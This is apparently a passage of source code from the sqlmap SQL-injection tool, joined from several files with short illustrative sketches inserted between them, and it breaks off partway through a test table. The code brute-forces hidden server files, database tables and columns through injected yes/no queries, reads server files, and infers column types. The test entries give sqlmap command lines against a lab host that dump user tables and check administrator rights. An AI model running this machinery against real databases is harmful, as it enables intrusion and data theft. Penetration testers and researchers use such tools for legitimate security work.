MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search(r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def fileExists(pathFile): retVal = [] message = "which common files file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % pathFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common files file location?\n" pathFile = readInput(message) or pathFile infoMsg = "checking files existence using items from '%s'" % pathFile logger.info(infoMsg) paths = getFileItems(pathFile, unique=True) kb.bruteMode = True try: conf.dbmsHandler.readFile(randomStr()) except SqlmapNoneDataException: pass except: kb.bruteMode = False raise threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(paths) threadData.shared.files = [] def fileExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: path = ntToPosixSlashes(paths[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break try: result = unArrayizeValue(conf.dbmsHandler.readFile(path)) except SqlmapNoneDataException: result = None kb.locks.io.acquire() if not isNoneValue(result): threadData.shared.files.append(result) if not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: pushValue(logger.getEffectiveLevel()) logger.setLevel(logging.CRITICAL) runThreads(conf.threads, fileExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during file existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) finally: kb.bruteMode = False logger.setLevel(popValue()) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no file(s) found" logger.warn(warnMsg) else: retVal = threadData.shared.files return retVal
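# --- Illustrative sketch (not sqlmap code): the shared-counter worker pattern used by ---
# fileExistsThread() above. Each worker claims the next wordlist index under one lock, runs
# its (slow) check outside the lock, and records hits under a second lock. The names
# wordlist/check are hypothetical.
import threading

def run_wordlist_check(wordlist, check, thread_count=4):
    count_lock, io_lock = threading.Lock(), threading.Lock()
    state = {"index": 0}
    hits = []

    def worker():
        while True:
            with count_lock:
                if state["index"] >= len(wordlist):
                    break
                item = wordlist[state["index"]]
                state["index"] += 1
            if check(item):  # e.g. a blind readFile()/EXISTS() probe
                with io_lock:
                    hits.append(item)

    threads = [threading.Thread(target=worker) for _ in range(thread_count)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return hits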
def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) pushValue(conf.db) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() message = "which common tables (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % tableFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common tables file location?\n" tableFile = readInput(message) or tableFile infoMsg = "performing table existence using items from '%s'" % tableFile logger.info(infoMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) for conf.db in (conf.db.split(',') if conf.db else [conf.db]): if conf.db: infoMsg = "checking database '%s'" % conf.db logger.info(infoMsg) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.files = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.files.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no table(s) found" if conf.db: warnMsg += " for database '%s'" % conf.db logger.warn(warnMsg) else: for item in threadData.shared.files: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.files): if _ not in kb.brute.tables: kb.brute.tables.append(_) conf.db = popValue() hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
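# --- Illustrative sketch (not sqlmap code): the boolean probe forged per candidate table ---
# tableExists() above asks one yes/no question per wordlist entry, conceptually
# EXISTS(SELECT <random int> FROM [db.]table); the helper below only builds that expression
# and is a hypothetical stand-in for BRUTE_TABLE_EXISTS_TEMPLATE plus safeStringFormat().
import random

def brute_table_expression(table, db=None):
    full_name = "%s.%s" % (db, table) if db else table
    return "EXISTS(SELECT %d FROM %s)" % (random.randint(1, 100), full_name)

# brute_table_expression("testusers", "testdb") -> e.g. "EXISTS(SELECT 42 FROM testdb.testusers)"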
def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common columns (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % columnFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common columns file location?\n" columnFile = readInput(message) or columnFile infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.files = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.files.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) finally: kb.bruteMode = False clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.files: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,): result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
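# --- Illustrative sketch (not sqlmap code): the numeric/non-numeric probe run per found column ---
# Once columnExists() above confirms a column, one extra boolean expression per DBMS family
# decides whether its values look numeric; the dbms strings below are plain illustrative labels,
# not sqlmap's DBMS constants.
def column_type_probe(dbms, column, table):
    if dbms == "MySQL":
        # numeric when no row contains a non-digit character
        return "NOT EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')" % (column, table, column)
    if dbms == "SQLite":
        return "EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')" % (column, table, column)
    # generic fallback: ROUND() comparing equal to itself only works on numeric values
    return "EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))" % (column, table, column, column)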
def bedTest(): """ Runs the testing against 'testbed' """ TESTS = ( # MaxDB ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("Kernel____7.9.10___Build_003-123-265-343", "Database: DBADMIN", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'SAP MaxDB'", "the back-end DBMS is SAP MaxDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("Kernel____7.9.10___Build_003-123-265-343", "Database: DBADMIN", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is SAP MaxDB", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Kernel____7.9.10___Build_003-123-265-343", "current database (equivalent to owner on SAP MaxDB): 'SYS'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # Informix ("-u 'http://testbed/informix/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("retrieved: 47", "IBM Informix Dynamic Server Version 14.10.FC2DE", "Database: testdb", "Table: users", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'Informix'", "the back-end DBMS is Informix", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/informix/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("IBM Informix Dynamic Server Version 14.10.FC2DE", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar |")), # Altibase ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "Database: SYS", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'Altibase'", "the back-end DBMS is Altibase", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "Database: SYS", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is Altibase", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("x86_64-unknown-linux-gnu", "current database (equivalent to owner on Altibase): 'SYS'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # CockroachDB ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", 
"name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'PostgreSQL'", "the back-end DBMS is PostgreSQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is PostgreSQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: PostgreSQL AND error-based", "the back-end DBMS is PostgreSQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: PostgreSQL AND error-based", "Title: PostgreSQL > 8.1 stacked queries", "Title: PostgreSQL > 8.1 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "x86_64-unknown-linux-gnu", "current database (equivalent to schema on PostgreSQL): 'public'", "current user: '******'", "[1 column]", "| surname | varchar |")), # CrateDB ("-u 'http://testbed/cratedb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("4.0.10", "Database: doc", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'CrateDB'", "the back-end DBMS is CrateDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cratedb/get_int.php?id=1' --flush-session --technique=B --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("4.0.10", "current database (equivalent to schema on CrateDB): 'doc'", "current user: '******'", "[1 column]", "| surname |")), # Drizzle ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("7.1.36-stable", "Drizzle fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("7.1.36-stable", "Drizzle fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "7.1.36-stable", "current database: 'testdb'", "current user: '******'", "[1 column]", "| 
surname | VARCHAR |")), # Firebird ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump --banner --sql-query=\"SELECT 'foobar'\"", ("banner: '2.5", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "possible DBMS: 'Firebird'", "the back-end DBMS is Firebird", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=U --is-dba --dump --banner --sql-query=\"SELECT 'foobar'\"", ("banner: '2.5", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is Firebird", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --search -C surname --answers='dump=n'", ("banner: '2.5", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # H2 ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("1.4.192", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'H2'", "the back-end DBMS is H2", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("1.4.192", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is H2", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: Generic inline queries", "Title: Generic UNION query (NULL) - 3 columns", "1.4.192", "current database (equivalent to schema on H2): 'PUBLIC'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # HSQLDB ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("2.3.4", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'HSQLDB'", "the back-end DBMS is HSQLDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("2.3.4", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is HSQLDB", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: HSQLDB > 2.0 AND time-based blind (heavy query)", "Title: Generic UNION query (NULL) - 3 columns", "2.3.4", "current database (equivalent to schema on HSQLDB): 'PUBLIC'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # IBM DB2 ("-u 'http://testbed/db2/get_int.php?id=1' 
--flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("banner: 'DB2 v", "Database: DB2INST1", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'IBM DB2'", "the back-end DBMS is IBM DB2", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/db2/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("banner: 'DB2 v", "Database: DB2INST1", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is IBM DB2", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/db2/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("banner: 'DB2 v", "current database (equivalent to owner on IBM DB2): 'DB2INST1'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR(1000) |")), # MariaDB ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: MySQL >= 5.0 AND error-based", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.0 AND error-based", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "10.4.12-MariaDB-1:10.4.12+maria~bionic", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar(1000) |")), # MySQL ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", 
"id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: MySQL >= 5.0 AND error-based", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.1 AND error-based", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "8.0.19", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar(1000) |")), # PostgreSQL ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-pc-linux-gnu", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'PostgreSQL'", "the back-end DBMS is PostgreSQL", "current user is DBA: False", ": 'foobar'")), ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-pc-linux-gnu", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic 